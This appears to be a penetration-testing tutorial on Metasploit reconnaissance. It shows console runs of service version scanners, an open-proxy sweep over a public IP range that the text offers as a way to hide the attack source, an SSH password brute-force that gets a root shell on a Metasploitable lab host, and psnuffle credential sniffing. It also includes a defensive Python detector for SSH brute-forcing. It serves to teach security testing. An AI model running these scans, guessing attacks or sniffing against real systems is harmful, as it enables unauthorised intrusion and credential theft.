Metasploit information gathering techniques [3]: service scanning, enumeration, password guessing and sniffing

1. Service scanning

Service enumeration: dig deeper into the services running on the open ports collected in the earlier steps.
Metasploit has many tools for this; most of them live in the Scanner auxiliary modules.
They are usually named [service_name]_version (sweeps hosts and determines the service version)
or [service_name]_login (performs password guessing).
Run search name:_version to list all service enumeration modules.

Network service scanning
① Telnet service scanning

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(telnet_version) > set threads 100
threads => 100
msf auxiliary(telnet_version) > run

② SSH service scanning

msf > use auxiliary/scanner/ssh/ssh_version

③ Oracle database service enumeration

msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version

④ Detecting and using open proxies
There are many techniques for hiding one's network identity, such as proxy servers and VPNs.
The open_proxy module

msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy

The security of proxy servers collected from public sources cannot be guaranteed.
Ways to hide the attack source: free VPN services can be gathered from public sources, or an OpenVPN service can be set up on a host that is already under control.

msf > use auxiliary/scanner/http/open_proxy
msf auxiliary(open_proxy) > set SITE www.google.com
SITE => www.google.com
msf auxiliary(open_proxy) > set RHOSTS 24.25.24.1-24.25.26.254
RHOSTS => 24.25.24.1-24.25.26.254
msf auxiliary(open_proxy) > set MULTIPORTS true
MULTIPORTS => true
msf auxiliary(open_proxy) > set VERIFY_CONNECT true
VERIFY_CONNECT => true
msf auxiliary(open_proxy) > set THREADS 100
THREADS => 100
msf auxiliary(open_proxy) > run

[*] Scanned  99 of 766 hosts (12% complete)
[*] Scanned 186 of 766 hosts (24% complete)
[*] Scanned 236 of 766 hosts (30% complete)
[*] Scanned 327 of 766 hosts (42% complete)
[*] Scanned 416 of 766 hosts (54% complete)
[*] Scanned 472 of 766 hosts (61% complete)
[*] Scanned 550 of 766 hosts (71% complete)
[*] Scanned 636 of 766 hosts (83% complete)
[*] Scanned 694 of 766 hosts (90% complete)
[*] Scanned 766 of 766 hosts (100% complete)
[*] Auxiliary module execution completed

2. Password guessing and sniffing

Building a high-quality wordlist requires social engineering.
1. SSH password guessing
Once an SSH service has been found, the ssh_login module runs a password-guessing attack against it; this needs good username and password wordlists.
USERNAME sets a single username; USER_FILE sets a username wordlist.
PASSWORD sets a single password; PASS_FILE sets a password wordlist.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 10.10.10.254
rhosts => 10.10.10.254
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set PASS_FILE /root/words.txt
PASS_FILE => /root/words.txt
msf auxiliary(ssh_login) > set THREADS 50
THREADS => 50
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'root:'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'root:sadsa'
[-] SSH - Failed: 'root:asfgdssaas'
[-] SSH - Failed: 'root:sadasdf'
[-] SSH - Failed: 'root:we132dds'
[-] SSH - Failed: 'root:root'
[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.10.10.128:36651 -> 10.10.10.254:22) at 2017-09-11 22:12:18 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
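The ssh_login run above leaves a very recognisable trace on the target: a burst of failed logins for one account from one source, followed by a success. As an added example (not part of the original notes or of Metasploit), here is a small Python detector that replays that pattern over constructed sshd auth.log lines, counting failures per source IP in a sliding window and marking a success that follows the burst. The log lines, the threshold of 5 failures in 60 seconds and the log year are all assumptions.

```python
"""Sliding-window detection of SSH password guessing in sshd auth logs."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines (assumption) in the syslog format sshd writes on Ubuntu hosts.
SAMPLE_LOG = """\
Sep 11 22:12:01 metasploitable sshd[2101]: Failed password for root from 10.10.10.128 port 36640 ssh2
Sep 11 22:12:01 metasploitable sshd[2102]: Failed password for root from 10.10.10.128 port 36641 ssh2
Sep 11 22:12:02 metasploitable sshd[2103]: Failed password for root from 10.10.10.128 port 36642 ssh2
Sep 11 22:12:02 metasploitable sshd[2104]: Failed password for root from 10.10.10.128 port 36643 ssh2
Sep 11 22:12:03 metasploitable sshd[2105]: Failed password for root from 10.10.10.128 port 36644 ssh2
Sep 11 22:12:04 metasploitable sshd[2106]: Accepted password for root from 10.10.10.128 port 36651 ssh2
Sep 11 22:30:00 metasploitable sshd[2200]: Failed password for alice from 10.10.10.5 port 50001 ssh2
Sep 11 22:31:00 metasploitable sshd[2201]: Accepted password for alice from 10.10.10.5 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+"
)

def parse(line, year=2017):
    """Return (timestamp, outcome, user, source_ip) or None. Syslog has no year, so one is assumed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4)

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Flag a source IP with >= threshold failures inside window_s seconds; note if a success follows."""
    failures = defaultdict(deque)   # source_ip -> timestamps of recent failures
    alerts = {}
    for raw in log_text.splitlines():
        rec = parse(raw)
        if rec is None:
            continue
        ts, outcome, user, src = rec
        if outcome == "Failed":
            q = failures[src]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and src not in alerts:
                alerts[src] = {"ip": src, "failures": len(q), "success_after": False, "user": None}
        elif src in alerts:   # a success right after a burst of failures is the strongest signal
            alerts[src]["success_after"] = True
            alerts[src]["user"] = user
    return list(alerts.values())
```

On the sample, only 10.10.10.128 is flagged (five failures in three seconds, then a successful root login); alice's single typo is not.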

2. psnuffle password sniffing
psnuffle is Metasploit's password sniffer; it can only sniff once an initial access point inside the target network has been obtained.

msf auxiliary(ssh_login) > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed

[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
msf auxiliary(psnuffle) > [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Failed FTP Login: 10.10.10.254:57922-10.10.10.129:21 >> msfadmin / msfadmin
[*] Failed FTP Login: 10.10.10.254:57922-10.10.10.129:21 >> msfadmin / 